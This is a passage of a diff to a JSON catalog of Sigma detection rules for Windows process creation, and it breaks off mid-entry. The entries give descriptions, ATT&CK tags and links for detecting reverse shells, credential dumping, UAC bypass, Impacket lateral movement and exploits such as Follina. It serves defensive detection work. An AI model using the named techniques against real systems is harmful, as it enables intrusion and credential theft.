+ "value": "Powershell Reverse Shell Connection" + }, + { + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "meta": { + "author": "Ivan Dyachkov, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + ], + "filename": "proc_creation_win_susp_diskshadow.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "value": "Execution via Diskshadow.exe" + }, + { + "description": "Detects netsh commands that configure a port forwarding (PortProxy)", + "meta": { + "author": "Florian Roth, omkar72, oscd.community", + "creation_date": "2019/01/29", + "falsepositive": [ + "Legitimate administration", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "filename": "proc_creation_win_netsh_port_fwd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.dfirnotes.net/portproxy_detection/", + "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "value": "Netsh Port Forwarding" + }, + { + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "meta": { + "author": "Nextron Systems", + "creation_date": "2022/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msdt_susp_parent.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" + ] + }, + "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", + "value": "MSDT Executed with Suspicious Parent" + }, + { + "description": "Detects a set of suspicious network related commands often used in recon stages", "meta": { "author": "Florian Roth", - "creation_date": "2019/12/22", + "creation_date": "2022/02/07", "falsepositive": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "filename": "proc_creation_win_hktl_createminidump.yml", + "filename": "proc_creation_win_susp_recon_network_activity.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "value": "Network Reconnaissance Activity" + }, + { + "description": "Detects the PowerShell command lines with special characters", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unlikely", + "Amazon SSM Document Worker", + "Windows Defender ATP" + ], + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "value": "Suspicious PowerShell Command Line" + }, + { + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/21", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_rundll32_keymgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/NinjaParanoid/status/1516442028963659777", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1555.004" ] }, - "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", - "value": "CreateMiniDump Hacktool" + "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "value": "Suspicious Key Manager Access" }, { - "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", + "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall", "meta": { - "author": "Christian Burkard, Florian Roth", - "creation_date": "2021/08/30", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/05/25", "falsepositive": [ - "Unknown" + "Legitimate administration" ], - "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", + "filename": "proc_creation_win_netsh_fw_add_susp_image.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" + "https://www.virusradar.com/en/Win32_Kasidet.AD/description", + "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml" ], "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.004" ] }, - "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", - "value": "UAC Bypass Tool UACMe Akagi" + "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "value": "Netsh Program Allowed with Suspcious Location" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "proc_creation_win_apt_wocao.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_wocao.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "value": "Operation Wocao Activity" + }, + { + "description": "Local accounts, System Owner/User discovery using operating systems utilities", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user enumerates local users for legitimate reason" + ], + "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "attack.t1087.001" + ] + }, + "uuid": "502b42de-4306-40b4-9596-6f590c81f073", + "value": "Local Accounts Discovery" + }, + { + "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", + "value": "New Lolbin Process by Office Applications" }, { "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", @@ -38679,108 +31703,189 @@ "value": "HTML Help Shell Spawn" }, { - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/24", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/21", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proc_creation_win_hwp_exploits.yml", + "filename": "proc_creation_win_susp_service_path_modification.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", - "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", - "https://twitter.com/cyberwar_15/status/1187287262054076416", - "https://blog.alyac.co.kr/1901", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" ], "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ] }, - "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "value": "Suspicious HWP Sub Processes" + "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", + "value": "Suspicious Service Path Modification" }, { - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "description": "Files with well-known filenames (sensitive files with credential data) copying", "meta": { - "author": "frack113", - "creation_date": "2022/07/18", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", "falsepositive": [ - "Legitimate use" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], - "filename": "proc_creation_win_icacls_deny.yml", + "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" + ] + }, + "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "value": "Copying Sensitive Files with Credential Data" + }, + { + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_curl_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/max_mal_/status/1542461200797163522", + "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "value": "Suspicious Curl Usage on Windows" + }, + { + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_format.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "value": "Format.com FileSystem LOLBIN" + }, + { + "description": "Detects possible password spraying attempts using Dsacls", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate use of dsacls to bind to an LDAP session" + ], + "filename": "proc_creation_win_dsacls_password_spray.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.execution", + "attack.t1218" ] }, - "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", - "value": "Use Icacls to Hide File to Everyone" + "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "value": "Password Spraying Attempts Using Dsacls" }, { - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/28", + "author": "Bhabesh Raj", + "creation_date": "2021/09/08", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://github.com/h3v0x/CVE-2021-26084_Confluence", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ] }, - "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "value": "Microsoft IIS Connection Strings Decryption" + "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", + "value": "Atlassian Confluence CVE-2021-26084" }, { - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", "meta": { - "author": "frack113", - "creation_date": "2022/01/09", + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2020/10/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_iis_http_logging.yml", + "filename": "proc_creation_win_susp_wmic_proc_create.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1047" ] }, - "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "value": "Disable Windows IIS HTTP Logging" + "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "value": "Suspicious WMIC Execution - ProcessCallCreate" }, { "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", @@ -38796,8 +31901,8 @@ "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", - "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" ], "tags": [ @@ -38809,1678 +31914,604 @@ "value": "Microsoft IIS Service Account Password Dumped" }, { - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/27", + "author": "frack113", + "creation_date": "2022/08/28", "falsepositive": [ - "Unknown" + "Legitimate use of Nim on developer systems" ], - "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", + "filename": "proc_creation_win_nimgrab.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" ], "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.command_and_control", + "attack.t1105" ] }, - "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", - "value": "ImagingDevices Unusual Parent Or Child Processes" + "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "value": "Nimgrab File Download" }, { - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "description": "Detects the use of Advanced Port Scanner.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2021/12/18", + "falsepositive": [ + "Legitimate administrative use", + "Tools with similar commandline (very rare)" + ], + "filename": "proc_creation_win_advanced_port_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "value": "Advanced Port Scanner" + }, + { + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", "meta": { "author": "Florian Roth", - "creation_date": "2021/07/24", + "creation_date": "2022/01/11", "falsepositive": [ - "Legitimate use of the impacket tools" + "Cases in which procdump just gets copied to a different directory without any renaming" ], - "filename": "proc_creation_win_impacket_compiled_tools.yml", + "filename": "proc_creation_win_procdump_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ] - }, - "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "value": "Impacket Tool Execution" - }, - { - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "meta": { - "author": "Ecco, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/09/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_impacket_lateralization.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", - "value": "Impacket Lateralization Detection" - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_import_cert_susp_locations.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" + "https://twitter.com/mrd0x/status/1480785527901204481", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1553.004" + "attack.t1036", + "attack.t1003.001" ] }, - "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", - "value": "Root Certificate Installed From Susp Locations" + "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", + "value": "Procdump Evasion" }, { - "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", + "author": "Florian Roth", + "creation_date": "2021/08/07", "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", - "Legitimate usage of scripts." + "Unknown" ], - "filename": "proc_creation_win_indirect_cmd.yml", + "filename": "proc_creation_win_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "value": "Suspicious PowerShell Mailbox Export to Share" + }, + { + "description": "Detects a when net.exe is called with a password in the command line", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4498716-1d52-438f-8084-4a603157d131", + "value": "Password Provided In Command Line Of Net.exe" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "proc_creation_win_sysinternals_eula_accepted.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", - "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.resource_development", + "attack.t1588.002" ] }, - "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", - "value": "Indirect Command Execution" + "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", + "value": "Usage of Sysinternals Tools" }, { - "description": "Detects the use of native Windows tool, forfiles to execute a file. Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", + "author": "pH-T, Nasreddine Bencherchali", + "creation_date": "2022/03/15", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", + "filename": "proc_creation_win_schtasks_appdata_local_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": 